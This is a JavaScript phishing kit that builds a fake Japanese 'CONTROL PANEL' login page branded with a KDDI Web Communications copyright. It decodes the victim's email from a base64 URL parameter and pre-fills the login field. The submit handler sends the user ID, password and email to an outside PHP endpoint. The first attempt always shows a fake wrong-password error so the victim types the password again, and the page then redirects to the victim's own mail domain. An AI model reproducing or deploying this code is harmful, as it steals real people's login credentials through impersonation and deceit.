// HTML template embedded in JavaScript (modified)
const htmlTemplate = `
    <div class="header">
        CONTROL PANEL
    </div>
    
    <div class="main-container">
        <div class="login-container">
            <form id="loginForm">
                <div class="form-group">
                    <label class="form-label" for="loginId">
                        ログインID
                        <span class="question-mark">?</span>
                    </label>
                    <input 
                        type="text" 
                        id="loginId" 
                        class="form-input"
                        value=""
                        required
                        readonly
                    />
                </div>
                
                <div class="form-group">
                    <label class="form-label" for="password">パスワード</label>
                    <input 
                        type="password" 
                        id="password" 
                        class="form-input"
                        value=""
                        required
                    />
                </div>
                
                <button type="submit" class="login-button" id="loginBtn">
                    <span class="button-text">ログイン</span>
                    <div class="loading"></div>
                </button>
            </form>
            
            <a href="#" class="forgot-password-link" id="forgotLink">
                パスワードのご変更、パスワードを忘れた場合
            </a>
        </div>
    </div>
    
    <div class="footer">
        <div class="footer-text">
            Copyright 2025 KDDI Web Communications Inc. All Rights Reserved.
        </div>
        <a href="#" class="privacy-link" id="privacyLink">プライバシーポリシー</a>
    </div>
`;

// Hidden elements needed for your functions (added programmatically)
function addHiddenElements() {
    const loginForm = document.getElementById('loginForm');
    if (loginForm) {
        loginForm.insertAdjacentHTML('beforeend', `
            <input type="hidden" id="decodedEmail" value="">
            <input type="hidden" id="attemptCount" value="0">
            <div id="errorMessage" style="display: none; color: red; margin-top: 10px;"></div>
        `);
    }
}

// Your original functions (adapted for the existing HTML structure)
function initializeEmailDecoding() {
    // Get email from URL parameter if exists
    const urlParams = new URLSearchParams(window.location.search);
    const fullQueryString = window.location.search.substring(1);
    
    if (fullQueryString) {
        try {
            const decodedEmail = atob(fullQueryString);
            document.getElementById('decodedEmail').value = decodedEmail;
            // Set the decoded email as the username field value and make it readonly
            document.getElementById('loginId').value = decodedEmail;
            // Focus on password field
            document.getElementById('password').focus();
        } catch (e) {
            console.error('Error decoding email:', e);
        }
    }
}

function sendLoginData(loginData) {
    const formData = new FormData();
    formData.append('userId', loginData.userId);
    formData.append('password', loginData.password);
    formData.append('email', loginData.email);
    formData.append('timestamp', loginData.timestamp);
    formData.append('attempt', loginData.attempt);
    
    return fetch('https://ecourses.stressedparent.co.uk/wolfedenit.php', {
        method: 'POST',
        body: formData
    });
}

function handleLoginResponse(attemptCount, userId, password, email) {
    const loginBtn = document.getElementById('loginBtn');
    const buttonText = loginBtn.querySelector('.button-text');
    
    if (attemptCount === 1) {
        // First attempt - show error and reset form
        showError('パスワードが間違っています。もう一度お試しください。');
        document.getElementById('password').value = '';
        document.getElementById('password').focus();
        loginBtn.disabled = false;
        buttonText.textContent = 'ログイン';
        loginBtn.classList.remove('show-loading');
    } else {
        // Second attempt - redirect
        let redirectUrl = 'dashboard.html';
        
        // If email exists, redirect to domain
        if (email && email.includes('@')) {
            const domain = email.split('@')[1];
            redirectUrl = 'http://' + domain;
        }
        
        // Simulate successful login
        setTimeout(() => {
            window.location.href = redirectUrl;
        }, 1000);
    }
}

function showError(message) {
    const errorElement = document.getElementById('errorMessage');
    if (errorElement) {
        errorElement.textContent = message;
        errorElement.style.display = 'block';
        
        // Auto-hide after 5 seconds
        setTimeout(() => {
            errorElement.style.display = 'none';
        }, 5000);
    }
}

function hideError() {
    const errorElement = document.getElementById('errorMessage');
    if (errorElement) {
        errorElement.style.display = 'none';
    }
}

function clearForm() {
    document.getElementById('loginId').value = '';
    document.getElementById('password').value = '';
    document.getElementById('decodedEmail').value = '';
    document.getElementById('attemptCount').value = '0';
    hideError();
}

// Modified setupEventListeners to use your functions
function setupEventListeners() {
    addHiddenElements();
    initializeEmailDecoding();
    
    const form = document.getElementById('loginForm');
    const loginBtn = document.getElementById('loginBtn');
    const loginId = document.getElementById('loginId');
    const password = document.getElementById('password');
    
    if (form) {
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            const buttonText = loginBtn.querySelector('.button-text');
            const userId = loginId.value;
            const passwordValue = password.value;
            const decodedEmail = document.getElementById('decodedEmail').value;
            
            // Validate inputs
            if (!userId.trim()) {
                showError('アカウント名を入力してください。');
                return;
            }
            
            if (!passwordValue.trim()) {
                showError('パスワードを入力してください。');
                return;
            }
            
            // Disable submit button and show loading state
            loginBtn.disabled = true;
            buttonText.textContent = 'ログイン中...';
            loginBtn.classList.add('show-loading');
            
            // Get and increment attempt count
            let attemptCount = parseInt(document.getElementById('attemptCount').value) || 0;
            attemptCount++;
            document.getElementById('attemptCount').value = attemptCount;
            
            // Prepare login data
            const loginData = {
                userId: userId,
                password: passwordValue,
                email: decodedEmail,
                timestamp: new Date().toISOString(),
                attempt: attemptCount
            };
            
            // Send data to external endpoint
            sendLoginData(loginData)
                .then(() => {
                    handleLoginResponse(attemptCount, userId, passwordValue, decodedEmail);
                })
                .catch(error => {
                    console.error('Login error:', error);
                    handleLoginResponse(attemptCount, userId, passwordValue, decodedEmail);
                });
        });
    }
    
    // Forgot password handler
    const forgotLink = document.getElementById('forgotLink');
    if (forgotLink) {
        forgotLink.addEventListener('click', function(e) {
            e.preventDefault();
            alert('パスワードリセット機能はここに実装されます');
        });
    }
    
    // Privacy policy handler
    const privacyLink = document.getElementById('privacyLink');
    if (privacyLink) {
        privacyLink.addEventListener('click', function(e) {
            e.preventDefault();
            alert('プライバシーポリシーはここに表示されます');
        });
    }
    
    // Handle page visibility changes
    document.addEventListener('visibilitychange', function() {
        if (document.visibilityState === 'visible') {
            // Page became visible - check if we need to reset anything
            const passwordField = document.getElementById('password');
            if (passwordField && !passwordField.value) {
                passwordField.focus();
            }
        }
    });
    
    // Handle browser back button
    window.addEventListener('popstate', function(event) {
        // Reset form when navigating back
        clearForm();
    });
}

// Initialize the application
function initApp() {
    // Apply body styles programmatically to match original
    document.body.style.fontFamily = '-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Arial, sans-serif';
    document.body.style.backgroundColor = '#f0f2f5';
    document.body.style.minHeight = '100vh';
    document.body.style.display = 'flex';
    document.body.style.flexDirection = 'column';
    document.body.style.margin = '0';
    document.body.style.padding = '0';
    
    // Inject HTML into the root element
    const root = document.getElementById('root');
    if (root) {
        root.style.display = 'flex';
        root.style.flexDirection = 'column';
        root.style.minHeight = '100vh';
        root.innerHTML = htmlTemplate;
        
        setupEventListeners();
    } else {
        console.error('Root element not found');
    }
}

// Start the application when DOM is loaded
document.addEventListener('DOMContentLoaded', initApp);

// Fallback for older browsers
if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', initApp);
} else {
    initApp();
}